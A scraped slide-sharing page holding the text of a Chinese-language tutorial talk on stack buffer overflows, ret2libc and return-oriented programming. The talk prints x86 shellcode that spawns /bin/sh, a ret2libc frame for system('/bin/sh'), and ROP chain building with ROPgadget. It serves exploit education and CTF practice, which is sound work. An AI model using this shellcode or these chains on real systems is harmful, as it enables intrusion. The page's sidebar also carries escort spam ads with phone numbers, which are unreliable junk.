cmd injectioncmd injection
cmd injection
 
Crawler
CrawlerCrawler
Crawler
 
Webshell 簡單應用
Webshell 簡單應用Webshell 簡單應用
Webshell 簡單應用
 
Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖
 
Antivirus Bypass
Antivirus BypassAntivirus Bypass
Antivirus Bypass
 

Kürzlich hochgeladen

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 

Kürzlich hochgeladen (20)

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 

ROP輕鬆談 Return Oriented Programming Easy Talk

  • 1. ROP輕鬆談 Return Oriented Programming Easy Talk Lays @ HackStuff
  • 2. Who Am I • Lays ( L4ys )! - l4ys.tw! • Reverse Engineering / Exploit! • Wargame / CTF! • HackStuff Member
  • 3. Outline • Buffer Overflow! • ret2libc / ret2text! • Return Oriented Programming! • Payload & More
  • 5. Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
  • 6. Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
  • 7. Function Call STACK ESP > ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 8. Function Call STACK ESP > arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 9. Function Call STACK ESP > arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 10. Function Call STACK ESP > ret addr arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
  • 11. Function Call STACK ESP > ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 12. Function Call STACK ESP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 13. Function Call STACK EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 14. Function Call STACK ESP > buffer EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 15. Function Call STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
  • 16. Buffer Overflow STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... ... } ! scanf( “%s”, buffer );
  • 17. Buffer Overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
  • 18. Buffer Overflow STACK EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA
  • 19. Buffer Overflow AFTER EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA BEFORE EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2
  • 20. Buffer Overflow AFTER ESP > AAAA AAAA EBP > AAAA AAAA AAAA AAAA ... mov esp, ebp pop ebp ret
  • 21. Buffer Overflow AFTER ESP > AAAA AAAA AAAA ... mov esp, ebp pop ebp ret = POP EIP
  • 22. Buffer Overflow AFTER ESP > AAAA AAAA ... mov esp, ebp pop ebp ret JMP AAAA
  • 24. Buffer Overflow • Shellcode! • 預先寫好的攻擊代碼! • in C / ASM xor %eax,%eax push %eax push $0x68732f2f push $0x6e69622f mov %esp,%ebx push %eax push %ebx mov %esp,%ecx mov $0xb,%al int $0x80 "x31xc0x50x68x2fx2fx73x68x68x2fx62x69"! "x6ex89xe3x50x53x89xe1xb0x0bxcdx80"
  • 25. Buffer Overflow STACK 0xFFFFD710 AAAA ... AAAA ... AAAA 0xFFFFD71C 0xFFFFD720 0xFFFFD720 Shellcode ...
  • 26. Buffer Overflow • 塞滿 Buffer ! • 覆蓋函數返回地址! • 跳轉至 Shellcode 執行 AAAAAAAAAAAA > x20xD7xFFxFF > Shellcode
  • 27. Exploit Mitigation • DEP ( Data Execution Prevention )! - 禁止執行位於資料區塊上的代碼! • ASLR ( Address Space Layout Randomization )! - 記憶體位置隨機化! • Stack Guard! • 函數返回前檢查 stack 結構完整
  • 28. checksec.sh • Check Security Options! • checksec.sh --file <executable-file>! • checksec.sh --proc <proc name>! http://www.trapkit.de/tools/checksec.html
  • 29. DEP Data Execution Prevention
  • 30. Data Execution Prevention • 資料區塊上的代碼無法執行! • [X] Stack ! • [X] Heap! • 硬體支援 ( CPU NX bit )! • 可以放 shellcode ,但不能 run STACK AAAA AAAA AAAA 0xFFFFD720 Shellcode
  • 32. 「而是 Shellcode 就在 Stack 上,! 你卻無法執行它。」 — DEP
  • 33. ret2libc / ret2text Return to existing code
  • 34. ret2libc • DEP! • [X] Stack ! • [X] Heap! • [ O ] Binary! • [ O ] Shared Library
  • 35. ret2libc • Return-to-libc! • Buffer Overflow 後,覆蓋返回地址為程式中現有函數地址! • 不能 return 到 shellcode,那就 return 到現有的 code 上! • 利用 libc.so 中的函數! • 偽造堆疊結構,建立函數呼叫! • e.g. system( “/bin/sh” )
  • 36. ret2libc STACK AAAA AAAA system() ret address } Buffer Target Function pointer to “/bin/sh” } Fake Frame system( “/bin/sh” )
  • 37. ret2libc STACK system() ret address pointer to “/bin/sh” ret system( “/bin/sh” )
  • 38. ret2libc STACK ret address pointer to “/bin/sh” system( “/bin/sh” )
  • 39. ASLR Address Space Layout Randomization
  • 40. ASLR • 隨機分配記憶體位置! • Stack ! • Heap! • Shared library! • VDSO! • …! • 難以預測目標函數 / shellcode 位置
  • 41. ret2text • Return-to-text! • return 到程式自身 code / PLT! • 沒開啟 PIE ( Position-independent Code ) 時,! ! .text 地址固定,不受 ASLR 影響! • 泄露有用資訊,搭配 ret2libc / ROP
  • 43. ret2libc / ret2text • Return-to-libc! • 需要知道目標函數地址! • 受 ASLR 影響,需配合 Memory Leak / libc.so! • static link! • Return-to-text! • 現有 code 不一定能滿足需求
  • 45. ROP • Exploitation! • Return to Shellcode! • Return to Functions! • Return to Gadgets
  • 46. ROP • RET 到自身程式包含 RET 指令的代碼區塊上
  • 47. ROP • RET 到自身程式 包含 RET 指令的代碼區塊上
  • 48. ROP • Buffer Overflow AAAA… + xE5x85x04x08 • RET = POP EIP STACK AAAA AAAA AAAA AAAA • 可控的 Stack 內容 • 透過 RET 再次控制 EIP
  • 49. 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! ROP
  • 50.
  • 51. Buffer Overflow to ROP Stack AAAA... 0x08040AB0 ... Overwrite ! return address
  • 52. Buffer Overflow to ROP Stack AAAA... 0x08040AB0 0x08040CD0 0x08040EF0 ... Append Addresses
  • 53. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... ret 0x08040AB0 xor eax, eax 0x08040AB1 ret
  • 54. ROP Chain Stack 0x08040CD0 0x08040EF0 ... ... ret 0x08040CD0 inc eax 0x08040CD1 ret
  • 55. ROP Chain Stack 0x08040EF0 ... ... ... ret 0x08040EF0 mov ecx, eax 0x08040EF2 ret
  • 56. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... 0x08040AB0 xor eax, eax ret ! 0x08040CD0 inc eax ret ! 0x08040EF0 mov ecx, eax ret !
  • 57. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
  • 58. ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
  • 60. ROP • Gadgets ! • 以 ret 結尾的指令序列! • pop ebx + pop eax + ret ! • add eax, ebx + xor eax, ecx + ret! • call eax / jmp eax! • int 0x80
  • 61. Operations • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • shr … + ret! • 修改 esp! • leave + ret! • 條件跳轉!
  • 62. Operations • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • …! • 修改 esp! • leave + ret! • 條件跳轉! • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret
  • 63. Write To Register • 寫入 Register! • pop reg + ret! • pop reg + pop reg + ret! • pop reg + pop reg + pop reg + ret! • …
  • 64. Write To Register • 寫入 eax 及 ebx! ! ! pop eax! ! ! pop ebx! ! ret!
  • 65. Write To Register • 寫入 eax 及 ebx Stack 0x080400AB 0xAAAAAAAA 0xBBBBBBBB next gadget ret 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
  • 66. Write To Register Stack 0xAAAAAAAA 0xBBBBBBBB next gadget ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
  • 67. Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
  • 68. Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
  • 69. Write To Register Stack next gadget ... ... ... eax = 0xAAAAAAAA ebx = 0xBBBBBBBB 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
  • 70. Write To Memory • 寫入 Memory! • mov [reg], reg! • mov [reg+xx], reg
  • 71. Write To Memory • 寫入 Memory eax = 0xAAAAAAAA ecx = 0xBBBBBBBB mov [ecx], eax! ret *0xBBBBBBBB = 0xAAAAAAAA
  • 72. System Call • System Call in ROP! • sys_execve(“/bin/sh”, NULL, NULL);
  • 73. System Call • sys_execve(“/bin/sh”, NULL, NULL)! • 尋找 int 0x80 指令! • 寫入 “/bin/sh” 到記憶體! • mov [reg], reg! • 設置 register! • pop reg! • eax = 11, ebx = &“/bin/sh”, ecx = 0, edx = 0
  • 75.
  • 76. ROPGadget • 以 ROPGadget 尋找 Gadget ! • ropgadget --binary ./file! • ropgadget --binary ./file --opcode! • ropgadget --binary ./file —ropchain! • pip install ropgadget https://github.com/JonathanSalwan/ROPgadget
  • 78. Conclusion • ROP Payload! • Payload 撰寫難度較高 / 重複利用性低! • Bypass ASLR / DEP! • 結合其他攻擊手段! • Load Shellcode! • ret2libc
  • 79. More • Sigreturn-Oriented Programming ( SROP ) ! • 利用 sigreturn system call! • 配合假造的 frame 控制 registers! • Blind ROP ( BROP )! • 在不知道程式內容的情況下實現 ROP Exploit
  • 80.
  • 81. Q & A
  • 82. RET